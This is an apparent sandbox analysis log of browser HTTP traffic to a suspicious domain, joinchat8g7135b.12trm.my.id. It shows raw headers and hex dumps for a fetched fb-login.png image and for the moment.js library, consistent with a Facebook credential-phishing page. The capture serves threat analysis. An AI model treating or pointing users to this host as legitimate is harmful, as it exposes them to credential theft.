                          2024-05-27 22:30:15 UTC645OUTGET /vhsfhqpdhdsih6/img/fb-login.png HTTP/1.1
                          Host: joinchat8g7135b.12trm.my.id
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://joinchat8g7135b.12trm.my.id/vhsfhqpdhdsih6/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC675INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: image/png
                          Content-Length: 31218
                          Connection: close
                          Last-Modified: Sun, 31 Oct 2021 01:09:16 GMT
                          Cache-Control: max-age=14400
                          CF-Cache-Status: HIT
                          Age: 5220
                          Accept-Ranges: bytes
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VuqyXcQ9iOhDrmeOJj%2BOJwowfo3Pn6QD2DqysPhOYQvXa6EPekUO9TarVMqeIQriBBZwGtk0NbbigXPd0kbsHoThey0Pls5JoNOGcAfAXBsOq%2BB5lj1GvJQKbX%2FZMS12qKFDbQxdPSEj16YA2qM%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 88a972ce2eb319d3-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC694INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 74 00 00 01 9b 08 06 00 00 00 fd 4a 7e 87 00 00 00 20 63 48 52 4d 00 00 7a 25 00 00 80 83 00 00 f9 ff 00 00 80 e9 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 6f 92 5f c5 46 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 79 78 49 44 41 54 78 5e ed dd 07 d8 2d 55 79 f7 7f f8 d3 8b 28 58 10 51 14 0b 88 28 62 05 7b 6f 58 b0 60 01 5b 14 8d b1 61 4b 8c d8 8d be 6a 54 8c b1 c6 de 5b d4 58 b1 97 a8 58 b0 f7 0e 28 2a 82 1d 14 a9 72 fe f7 77 af d9 e1 70 ce 79 9e 67 3f fb d9 33 b3 66 ee ef e7 ba 7e d7 5a fb 24 6f 5e 3d 67 cf 9e 99 75 af b2 f9 ba 75 eb 36 93 24 49 92 24 49 92 24 49 52 bd fe bf a6 95 24 49 92 24 49 92 24 49 52 a5 2c e8 48 92 24 49 92 24 49 92 24 55 ce 82 8e 24 49 92 24 49
                          Data Ascii: PNGIHDRtJ~ cHRMz%u0`:o_FpHYsyxIDATx^-Uy(XQ(b{oX`[aKjT[XX(*rwpyg?3f~Z$o^=guu6$I$I$IR$I$I$IR,H$I$I$U$I$I
                          2024-05-27 22:30:16 UTC1369INData Raw: 92 24 55 ce 82 8e 24 49 92 24 49 92 24 49 52 e5 2c e8 48 92 24 49 92 24 49 92 24 55 ce 82 8e 24 49 92 24 49 92 24 49 52 e5 36 5f b7 6e 5d d3 55 32 17 8b ec 1c d9 25 b2 23 7f 10 b6 8a f0 e7 5b 44 ce 6e da 33 23 7f 8a 80 ff f9 19 11 3e 9f 1b 39 27 c2 ff fc d4 c8 69 11 49 92 24 49 92 24 49 92 d4 02 0b 3a e3 72 a5 c8 5e 91 fd 22 97 8f ec 11 b9 68 64 a7 08 45 9b 2d 23 ac ca 3a af 69 f9 9f 2d c2 1f 22 fc df 5c 1f 5f 2c 8a 3d 14 80 fe 16 f9 4b e4 cf 91 df 46 7e 1f 39 ae f9 fc cb c8 49 4d 2b 49 92 24 75 85 67 64 9e 9f f7 8c 5c b6 69 99 ec b4 7b 84 49 4e db 37 7f 26 49 92 24 ad 16 cf 92 57 8b ec 16 b9 42 e4 32 4d ff e2 11 9e 35 19 ab bd 6e 84 71 52 69 66 16 74 86 89 82 cd 6d 23 fc 28 50 c0 e1 a5 73 db 08 45 15 7e 14 86 e6 77 11 be 88 9b 47 58 19 c4 6a 9f 93 23 27
                          Data Ascii: $U$I$I$IR,H$I$I$U$I$I$IR6_n]U2%#[Dn3#>9'iI$I$I:r^"hdE-#:i-"\_,=KF~9IM+I$ugd\i{IN7&I$WB2M5nqRiftm#(PsE~wGXj#'
                          2024-05-27 22:30:16 UTC1369INData Raw: 92 24 a9 5a 99 0b 3a 47 44 b6 2a 5d 49 92 24 49 92 24 49 92 a4 7a 65 2e e8 dc 2f e2 76 6b 92 24 49 92 24 49 92 24 a9 7a 99 0b 3a 7b 34 ad 24 49 92 24 49 92 24 49 52 d5 b2 16 74 1e 12 c9 7e 7e 90 24 49 92 24 49 92 24 49 1a 88 ac 45 8d c3 22 6e b7 26 49 92 24 49 92 24 49 92 06 21 6b 41 67 af a6 95 24 49 92 24 49 92 24 49 aa 5e c6 82 ce 7e 91 ad 4b 57 92 24 49 92 24 49 92 24 a9 7e 19 0b 3a 0f 8c ec 52 ba 92 24 49 92 24 49 92 24 49 f5 cb 58 d0 b9 61 d3 4a 92 24 49 92 24 49 92 24 0d c2 e6 eb d6 ad 6b ba 69 9c 12 b9 44 e9 6a 06 7f 68 5a 9c d9 e4 ec c8 b9 4d ce 8b b4 81 62 e3 f4 ff f6 39 91 eb 95 ae 24 49 92 7a f2 db c8 c5 4b 37 05 9e 83 2f 56 ba 92 24 49 6a d9 4f 22 57 2a dd 34 f6 88 fc b2 74 a5 d9 64 2b e8 ec 1a f9 41 c4 2d d7 36 ed 77 91 bf 47 7e 16 f9 6a e4
                          Data Ascii: $Z:GD*]I$I$Ize./vk$I$I$z:{4$I$I$IRt~~$I$I$IE"n&I$I$I!kAg$I$I$I^~KW$I$I$~:R$I$I$IXaJ$I$I$kiDjhZMb9$IzK7/V$IjO"W*4td+A-6wG~j
                          2024-05-27 22:30:16 UTC1369INData Raw: 5e 16 74 f2 60 d0 ec fa 91 7d 23 57 89 5c 3a b2 5b 84 97 f5 e9 00 db fa ab f1 2e da b4 1b 62 d0 62 fd 17 11 5e 52 fe 14 e1 e5 fe e4 c8 cf 22 9f 8b 7c 36 22 69 ed b8 36 af 15 e1 81 f5 32 11 1e e4 2e 19 61 90 8d 41 03 ae df 6d 9a 30 90 c0 0d 7b f3 08 83 07 b3 0e a8 fe 31 32 1d 6c e0 77 80 6b 9c 81 3a 06 d3 79 21 e2 7f ce 00 ed af 23 3c 44 9e 14 f9 7c 84 eb 5e 79 4d bf 9b 57 8e f0 bd 24 bb 47 2e 12 d9 25 c2 20 f0 d6 11 be 97 53 7c bf 96 ba bf 6c 88 fb 0d a6 f7 9c 69 81 87 f0 7d 9c 7e 27 b9 ef 7c 3f f2 8d 88 05 a0 3a 58 d0 a9 1f cf 82 3c 17 5e 35 b2 57 e4 12 11 ae dd 0b 45 b8 87 4c 2d f7 ef 38 7d 26 e4 ba e6 1e 32 bd 3e 7f 1f e1 99 f0 a7 11 ae cd 2f 47 4e 88 48 43 b0 73 84 fb 14 ef 49 5c 17 3c 73 11 fa 3c 73 f1 3f 5f ff 9d 69 7a 8f bb 75 d3 2e e7 23 11 fe f7
                          Data Ascii: ^t`}#W\:[.bb^R"|6"i62.aAm0{12lwk:y!#<D|^yMW$G.% S|li}~'|?:X<^5WEL-8}&2>/GNHCsI\<s<s?_izu.#
                          2024-05-27 22:30:16 UTC1369INData Raw: 28 f6 b0 7a 4e 8b 61 41 67 dc 78 7f 7d 6a 24 eb ef 0c f7 ec 17 44 18 17 5d 13 0b 3a aa dd c9 11 0e d9 1b 93 e7 47 98 e5 bf 75 24 e3 e0 30 3f 60 e4 f1 91 a3 f9 83 0e 64 29 e8 fc 2a c2 56 7d 9a 1f e7 13 3c 23 c2 76 1e be d0 b4 83 01 3c b6 67 e3 e5 c7 d9 d9 ab 37 2d e2 5c 61 f2 c9 ef e8 bc f8 1e f2 0c fb de 08 85 5b cd c6 82 4e 3b d8 3a 8a 42 0e 67 81 20 db f3 21 cf 85 e0 1c 2c 9e 0f 39 a3 4d b9 dc 36 f2 cf 11 0e 56 e7 1d c9 7b db 7c f8 cd 62 16 30 cf 56 6f 8a 78 7e 95 96 42 b1 94 22 0e db a9 f9 ce b3 36 14 77 d8 89 80 95 a7 1f 88 30 86 a5 f9 59 d0 19 37 c6 ac d8 85 29 2b ce e7 da bf 74 d7 c6 82 8e 6a f7 e3 c8 95 4b 77 d0 78 60 7a 57 84 c3 03 99 45 ed 4c b3 f2 c2 71 52 84 17 77 0e 55 6f 93 05 1d ad 84 41 72 66 84 f2 70 e1 f5 d9 1d 06 f1 d8 16 8b d9 d9 ce 28
                          Data Ascii: (zNaAgx}j$D]:Gu$0?`d)*V}<#v<g7-\a[N;:Bg !,9M6V{|b0Vox~B"6w0Y7)+tjKwx`zWELqRwUoArfp(
                          2024-05-27 22:30:16 UTC1369INData Raw: 93 03 05 c0 77 44 2e 15 f1 be 34 4e fc 1e 3c 21 c2 81 e2 43 b4 5f e4 7f 22 3b 45 7c e9 1e 36 be 8b 1c 6e c9 2a d2 73 f9 83 24 5c a1 33 1b fe df 7c 35 72 a1 88 f7 a3 76 fd 31 c2 36 16 99 57 ce d5 80 33 e0 28 78 fb 7d 1f 07 ae 2b 0a 3b 77 6c 5a d5 e7 ce 91 ff 88 f0 4c e9 b9 54 e3 70 74 e4 f5 11 56 ca 65 e6 0a 9d f1 60 e2 0d c7 51 64 c4 7d 94 05 0a 8b d8 71 68 93 5c a1 a3 9a 6d d1 b4 35 62 49 b3 c5 9c 6e f0 62 c8 2a 0b 96 24 33 cb 55 da 14 ce 20 61 bf e8 ab 45 1c 4c 18 af f3 22 43 2d e6 b0 b2 88 b3 80 38 6c df 62 ce f0 f1 3b 73 60 84 65 f4 f7 e7 0f a4 06 e7 16 70 80 3f 33 12 bd 1f b5 8f 81 cc 6b 47 d8 82 8d 7d da d5 2d 66 df 32 a1 88 7f 03 bf ef e3 31 3d c7 90 c9 74 ac 00 51 5d 3e 1b e1 79 98 fb 8c c5 9c f1 b8 7d e4 f0 c8 ab 23 99 57 35 68 1c 98 e8 c1 59 b1
                          Data Ascii: wD.4N<!C_";E|6n*s$\3|5rv16W3(x}+;wlZLTptVe`Qd}qh\m5bInb*$3U aEL"C-8lb;s`ep?3kG}-f21=tQ]>y}#W5hY
                          2024-05-27 22:30:16 UTC1369INData Raw: 73 7b c5 e1 e1 59 91 95 04 ae 98 5b 99 2b 04 b4 5a 5c 5f 3c 0f 9d 10 b9 12 7f a0 55 e1 dc de 37 45 d8 4e 5c 9a 15 e7 9a 1d 14 71 d2 90 fa 74 fb 08 cf 57 59 c7 50 ff 18 79 7a e9 76 cb 82 8e 6a 75 5e d3 76 ed 3d 11 1f a4 86 89 1b c8 eb 4a 77 23 99 67 0b 0c d1 73 22 6c 79 98 f5 a1 40 17 74 56 e4 3b a5 5b 0d 8a 39 df 8a ec 3e f9 24 ad 8c df b3 5b 46 5c 4d 3a 7c af 8e 78 7f 1a 26 fe dd ae 17 e1 39 43 9b c6 0e 09 fc 3d 59 cc d1 3c 58 5d c2 61 fe 16 75 66 c7 b9 13 4f 8a 78 5f d1 3c b8 e6 98 94 fc b1 c9 27 a9 7b 2f 89 64 fe fd e2 b9 e9 35 a5 db 2d 0b 3a aa 15 03 78 5d e3 d0 f5 6d 4b 57 03 c5 5e f6 ef 2d dd 0b f0 b7 6e 38 38 7c f7 f0 88 2f 35 9a fa 72 d3 d6 82 62 0e e7 76 59 fc d7 6a b1 75 11 cb f1 9f 32 f9 a4 21 62 c0 64 9b d2 d5 40 f1 7c c1 73 06 33 4a 75 41 ac
                          Data Ascii: s{Y[+Z\_<U7EN\qtWYPyzvju^v=Jw#gs"ly@tV;[9>$[F\M:|x&9C=Y<X]aufOx_<'{/d5-:x]mKW^-n88|/5rbvYju2!bd@|s3JuA
                          2024-05-27 22:30:16 UTC1369INData Raw: 1c 17 79 59 e9 d6 c3 82 8e 6a f4 a7 a6 5d 34 66 24 f8 12 23 f5 87 17 b7 8b 95 ae b4 a4 df 45 8e 2a dd 5e 50 f8 f7 5e a1 be ec 1d b9 7d e9 4a ea 01 83 5e cf 2b dd 51 f9 b7 88 13 15 54 0b be 8b 4c a0 19 63 f1 74 8a b3 26 7c 9e 54 4d 28 2e 7e b1 74 a5 99 3d 2e c2 ce 15 59 b1 73 c8 ad 4a b7 2e 16 74 54 23 0e 9b 6a c3 bf 44 7c a8 92 fa c1 76 87 37 8b 38 98 a0 95 9c 16 69 f3 1c b5 e5 50 74 bc 48 e9 4a bd e0 39 85 03 cb 25 f5 87 fb 40 75 5b 6b ac 01 e7 e6 8c fd 6c 20 0d 0f ef 04 63 bd df f1 de 73 b7 88 63 0f aa cd a5 23 14 1b a5 59 fd 73 24 eb 6f d9 6f 23 6f 8f 30 3e 51 1d 0b 3a aa d1 2f 9a 76 91 b8 69 6d 57 ba 92 7a f0 a6 88 2f 35 9a c5 47 9b b6 6b 57 8a 58 74 54 0d d8 8a e6 29 a5 2b a9 07 3c af dc bf 74 07 8f 1d 0a 18 c0 f3 19 4c 35 e2 fd 7c 8c 87 b5 bf 21 e2
                          Data Ascii: yYj]4f$#E*^P^}J^+QTLct&|TM(.~t=.YsJ.tT#jD|v78iPtHJ9%@u[kl csc#Ys$oo#o0>Q:/vimWz/5GkWXtT)+<tL5|!
                          2024-05-27 22:30:16 UTC1369INData Raw: 3a e4 cf b8 fe a6 d7 19 ef 3d 8c 85 f0 4c c5 f9 29 5c 87 be f7 ac 0d f7 3c b6 c3 9d fe 3b d4 ee 85 11 56 36 3b 26 36 bf 8f 44 78 0f 61 6c 81 d5 d9 5c 6f 5c 7b dc e7 40 4b a1 9a 70 cf e3 5e c7 8a a8 e9 aa 28 fe df de ba 74 35 a7 ef 46 f6 2b dd de 71 8e e6 95 4a 37 8d 3d 22 bc d7 f7 89 df 5c ce 3f ce fa 9c cf 56 6b 6c 33 3e 18 16 74 54 9b a3 23 8b 38 7c f4 d3 91 9b 95 ae 56 89 87 68 7e 18 7e 16 f9 5a 84 22 db b1 11 6e ac f3 b8 56 84 7f 8b 5b 45 58 42 cf 0b 90 33 98 da 51 4b 41 87 2d 9b 78 18 d0 fc 18 3c a0 28 c3 99 25 5c 7f 3c 60 7d 34 d2 f6 ca 04 ce 2c b9 71 e4 3a 11 ae 57 06 27 18 ac 60 60 b0 cd 7b fd 31 91 1b 95 6e 67 4e 8a 50 10 c8 8a ef 12 03 53 4c 80 f8 3a 7f 30 40 ac 24 ba 7e 24 c3 3d 85 62 ce 2d 4b b7 57 16 74 da c3 8b 3c cf 5f fc 36 7d 35 f2 f9 c8
                          Data Ascii: :=L)\<;V6;&6Dxal\o\{@Kp^(t5F+qJ7="\?Vkl3>tT#8|Vh~~Z"nV[EXB3QKA-x<(%\<`}4,q:W'``{1ngNPSL:0@$~$=b-KWt<_6}5
                          2024-05-27 22:30:16 UTC1369INData Raw: ef 60 fd bf 93 1a fe 8d b0 fe 7f 16 be 3b 3c 14 fd 6d f2 69 3e ef 8c f0 b2 ac 0b e2 fb c0 43 27 e7 5f 0c 01 87 f6 7e 33 c2 4c 43 67 ac cd ae ef 82 8e 03 7d 4b e3 1a fc 4b 84 6d 3e 58 1d 92 05 33 e0 28 d8 f0 db c3 6f fd 86 83 4d 0c 50 5f 2e b2 96 df fd d5 ca fa 3d 65 10 99 bf eb b1 a3 60 b7 77 64 ac cf 7d 9c 35 d5 e7 1e cf fe ce af 1e c5 1c 66 29 73 d6 c2 50 30 28 c7 76 9a 16 75 36 56 c3 60 d7 86 be 1f 19 73 b1 7e b5 58 8d ca 99 84 ff 18 61 b2 d1 10 b0 3a ee ab 91 dd 22 16 76 ce c7 3d 67 d7 d2 ad 0a 5b 0e bf 25 62 11 f5 7c ac ca e1 de c1 ca b3 a1 60 22 22 5b 48 73 be 95 ce 47 91 99 f3 f6 fa 62 41 a7 1b ac ce 26 59 7f c7 6a 38 ae 60 4d 16 51 d0 19 82 8c 55 c7 9b 46 6a 9e 15 d1 16 f7 b1 dd 18 2b 73 5e 1f e1 00 f0 a1 79 6d 84 19 6b 9e ad 33 9b 3e 6f 4a 6c 3b
                          Data Ascii: `;<mi>C'_~3LCg}KKm>X3(oMP_.=e`wd}5f)sP0(vu6V`s~Xa:"v=g[%b|`""[HsGbA&Yj8`MQUFj+s^ymk3>oJl;


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.449752104.17.24.144435308C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-27 22:30:15 UTC571OUTGET /ajax/libs/moment.js/2.13.0/moment.min.js HTTP/1.1
                          Host: cdnjs.cloudflare.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: script
                          Referer: https://joinchat8g7135b.12trm.my.id/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-27 22:30:16 UTC954INHTTP/1.1 200 OK
                          Date: Mon, 27 May 2024 22:30:16 GMT
                          Content-Type: application/javascript; charset=utf-8
                          Transfer-Encoding: chunked
                          Connection: close
                          Access-Control-Allow-Origin: *
                          Cache-Control: public, max-age=30672000
                          ETag: W/"5eb03f26-b635"
                          Last-Modified: Mon, 04 May 2020 16:13:26 GMT
                          cf-cdnjs-via: cfworker/kv
                          Cross-Origin-Resource-Policy: cross-origin
                          Timing-Allow-Origin: *
                          X-Content-Type-Options: nosniff
                          CF-Cache-Status: HIT
                          Age: 439104
                          Expires: Sat, 17 May 2025 22:30:16 GMT
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1aSqb4zxP4eMN8v8A2BUPNVhfDZri5BbRkYIP4udiHYbeu%2FvlIXJVNvUFPcBnU2Tz0NwN0QeTGhywFrUxrUCiwaxKGPoFOGu1F5tGfnUZcvbnBeSn0N7TOxAGMMl2zlgl5R2LQYF"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Strict-Transport-Security: max-age=15780000
                          Server: cloudflare
                          CF-RAY: 88a972ce2de343a6-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-27 22:30:16 UTC415INData Raw: 37 62 66 37 0d 0a 2f 2f 21 20 6d 6f 6d 65 6e 74 2e 6a 73 0a 2f 2f 21 20 76 65 72 73 69 6f 6e 20 3a 20 32 2e 31 33 2e 30 0a 2f 2f 21 20 61 75 74 68 6f 72 73 20 3a 20 54 69 6d 20 57 6f 6f 64 2c 20 49 73 6b 72 65 6e 20 43 68 65 72 6e 65 76 2c 20 4d 6f 6d 65 6e 74 2e 6a 73 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 2f 2f 21 20 6c 69 63 65 6e 73 65 20 3a 20 4d 49 54 0a 2f 2f 21 20 6d 6f 6d 65 6e 74 6a 73 2e 63 6f 6d 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 62 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65
                          Data Ascii: 7bf7//! moment.js//! version : 2.13.0//! authors : Tim Wood, Iskren Chernev, Moment.js contributors//! license : MIT//! momentjs.com!function(a,b){"object"==typeof exports&&"undefined"!=typeof module?module.exports=b():"function"==typeof define&&de
                          2024-05-27 22:30:16 UTC1369INData Raw: 41 72 72 61 79 7c 7c 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 61 29 7b 72 65 74 75 72 6e 20 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 44 61 74 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 44 61 74 65 5d 22 3d 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 65 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 5b 5d 3b 66 6f 72 28 63 3d 30 3b 63 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 63 29 64 2e 70 75 73 68 28 62 28 61 5b 63 5d 2c 63 29 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 66 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a
                          Data Ascii: Array||"[object Array]"===Object.prototype.toString.call(a)}function d(a){return a instanceof Date||"[object Date]"===Object.prototype.toString.call(a)}function e(a,b){var c,d=[];for(c=0;c<a.length;++c)d.push(b(a[c],c));return d}function f(a,b){return Obj
                          2024-05-27 22:30:16 UTC1369INData Raw: 5f 66 29 2c 6d 28 62 2e 5f 6c 29 7c 7c 28 61 2e 5f 6c 3d 62 2e 5f 6c 29 2c 6d 28 62 2e 5f 73 74 72 69 63 74 29 7c 7c 28 61 2e 5f 73 74 72 69 63 74 3d 62 2e 5f 73 74 72 69 63 74 29 2c 6d 28 62 2e 5f 74 7a 6d 29 7c 7c 28 61 2e 5f 74 7a 6d 3d 62 2e 5f 74 7a 6d 29 2c 6d 28 62 2e 5f 69 73 55 54 43 29 7c 7c 28 61 2e 5f 69 73 55 54 43 3d 62 2e 5f 69 73 55 54 43 29 2c 6d 28 62 2e 5f 6f 66 66 73 65 74 29 7c 7c 28 61 2e 5f 6f 66 66 73 65 74 3d 62 2e 5f 6f 66 66 73 65 74 29 2c 6d 28 62 2e 5f 70 66 29 7c 7c 28 61 2e 5f 70 66 3d 6a 28 62 29 29 2c 6d 28 62 2e 5f 6c 6f 63 61 6c 65 29 7c 7c 28 61 2e 5f 6c 6f 63 61 6c 65 3d 62 2e 5f 6c 6f 63 61 6c 65 29 2c 68 64 2e 6c 65 6e 67 74 68 3e 30 29 66 6f 72 28 63 20 69 6e 20 68 64 29 64 3d 68 64 5b 63 5d 2c 65 3d 62 5b 64 5d 2c
                          Data Ascii: _f),m(b._l)||(a._l=b._l),m(b._strict)||(a._strict=b._strict),m(b._tzm)||(a._tzm=b._tzm),m(b._isUTC)||(a._isUTC=b._isUTC),m(b._offset)||(a._offset=b._offset),m(b._pf)||(a._pf=j(b)),m(b._locale)||(a._locale=b._locale),hd.length>0)for(c in hd)d=hd[c],e=b[d],
                          2024-05-27 22:30:16 UTC1369INData Raw: 74 72 69 6e 67 2e 63 61 6c 6c 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 79 28 61 29 7b 76 61 72 20 62 2c 63 3b 66 6f 72 28 63 20 69 6e 20 61 29 62 3d 61 5b 63 5d 2c 77 28 62 29 3f 74 68 69 73 5b 63 5d 3d 62 3a 74 68 69 73 5b 22 5f 22 2b 63 5d 3d 62 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 3d 61 2c 74 68 69 73 2e 5f 6f 72 64 69 6e 61 6c 50 61 72 73 65 4c 65 6e 69 65 6e 74 3d 6e 65 77 20 52 65 67 45 78 70 28 74 68 69 73 2e 5f 6f 72 64 69 6e 61 6c 50 61 72 73 65 2e 73 6f 75 72 63 65 2b 22 7c 22 2b 2f 5c 64 7b 31 2c 32 7d 2f 2e 73 6f 75 72 63 65 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 67 28 7b 7d 2c 61 29 3b 66 6f 72 28 63 20 69 6e 20 62 29 66 28 62 2c 63 29 26 26 28 78 28 61 5b 63 5d 29 26 26 78 28 62 5b 63 5d 29 3f 28 64 5b
                          Data Ascii: tring.call(a)}function y(a){var b,c;for(c in a)b=a[c],w(b)?this[c]=b:this["_"+c]=b;this._config=a,this._ordinalParseLenient=new RegExp(this._ordinalParse.source+"|"+/\d{1,2}/.source)}function z(a,b){var c,d=g({},a);for(c in b)f(b,c)&&(x(a[c])&&x(b[c])?(d[
                          2024-05-27 22:30:16 UTC1369INData Raw: 20 63 3b 6e 75 6c 6c 21 3d 6e 64 5b 61 5d 26 26 28 62 3d 7a 28 6e 64 5b 61 5d 2e 5f 63 6f 6e 66 69 67 2c 62 29 29 2c 63 3d 6e 65 77 20 41 28 62 29 2c 63 2e 70 61 72 65 6e 74 4c 6f 63 61 6c 65 3d 6e 64 5b 61 5d 2c 6e 64 5b 61 5d 3d 63 2c 45 28 61 29 7d 65 6c 73 65 20 6e 75 6c 6c 21 3d 6e 64 5b 61 5d 26 26 28 6e 75 6c 6c 21 3d 6e 64 5b 61 5d 2e 70 61 72 65 6e 74 4c 6f 63 61 6c 65 3f 6e 64 5b 61 5d 3d 6e 64 5b 61 5d 2e 70 61 72 65 6e 74 4c 6f 63 61 6c 65 3a 6e 75 6c 6c 21 3d 6e 64 5b 61 5d 26 26 64 65 6c 65 74 65 20 6e 64 5b 61 5d 29 3b 72 65 74 75 72 6e 20 6e 64 5b 61 5d 7d 66 75 6e 63 74 69 6f 6e 20 48 28 61 29 7b 76 61 72 20 62 3b 69 66 28 61 26 26 61 2e 5f 6c 6f 63 61 6c 65 26 26 61 2e 5f 6c 6f 63 61 6c 65 2e 5f 61 62 62 72 26 26 28 61 3d 61 2e 5f 6c 6f
                          Data Ascii: c;null!=nd[a]&&(b=z(nd[a]._config,b)),c=new A(b),c.parentLocale=nd[a],nd[a]=c,E(a)}else null!=nd[a]&&(null!=nd[a].parentLocale?nd[a]=nd[a].parentLocale:null!=nd[a]&&delete nd[a]);return nd[a]}function H(a){var b;if(a&&a._locale&&a._locale._abbr&&(a=a._lo
                          2024-05-27 22:30:16 UTC1369INData Raw: 63 65 28 2f 5e 5c 5b 7c 5c 5d 24 2f 67 2c 22 22 29 3a 61 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 2f 67 2c 22 22 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 3d 61 2e 6d 61 74 63 68 28 70 64 29 3b 66 6f 72 28 62 3d 30 2c 63 3d 64 2e 6c 65 6e 67 74 68 3b 63 3e 62 3b 62 2b 2b 29 73 64 5b 64 5b 62 5d 5d 3f 64 5b 62 5d 3d 73 64 5b 64 5b 62 5d 5d 3a 64 5b 62 5d 3d 53 28 64 5b 62 5d 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 65 2c 66 3d 22 22 3b 66 6f 72 28 65 3d 30 3b 63 3e 65 3b 65 2b 2b 29 66 2b 3d 64 5b 65 5d 69 6e 73 74 61 6e 63 65 6f 66 20 46 75 6e 63 74 69 6f 6e 3f 64 5b 65 5d 2e 63 61 6c 6c 28 62 2c 61 29 3a 64 5b 65 5d 3b 72 65 74 75 72 6e 20 66 7d 7d 66 75 6e 63 74 69 6f 6e 20 55 28 61 2c 62 29
                          Data Ascii: ce(/^\[|\]$/g,""):a.replace(/\\/g,"")}function T(a){var b,c,d=a.match(pd);for(b=0,c=d.length;c>b;b++)sd[d[b]]?d[b]=sd[d[b]]:d[b]=S(d[b]);return function(b){var e,f="";for(e=0;c>e;e++)f+=d[e]instanceof Function?d[e].call(b,a):d[e];return f}}function U(a,b)
                          2024-05-27 22:30:16 UTC1369INData Raw: 73 53 68 6f 72 74 5b 56 64 2e 74 65 73 74 28 62 29 3f 22 66 6f 72 6d 61 74 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 5d 5b 61 2e 6d 6f 6e 74 68 28 29 5d 7d 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 2c 66 2c 67 3d 61 2e 74 6f 4c 6f 63 61 6c 65 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 21 74 68 69 73 2e 5f 6d 6f 6e 74 68 73 50 61 72 73 65 29 66 6f 72 28 74 68 69 73 2e 5f 6d 6f 6e 74 68 73 50 61 72 73 65 3d 5b 5d 2c 74 68 69 73 2e 5f 6c 6f 6e 67 4d 6f 6e 74 68 73 50 61 72 73 65 3d 5b 5d 2c 74 68 69 73 2e 5f 73 68 6f 72 74 4d 6f 6e 74 68 73 50 61 72 73 65 3d 5b 5d 2c 64 3d 30 3b 31 32 3e 64 3b 2b 2b 64 29 66 3d 68 28 5b 32 65 33 2c 64 5d 29 2c 74 68 69 73 2e 5f 73 68 6f 72 74 4d 6f 6e 74 68 73 50 61 72 73 65 5b 64 5d 3d
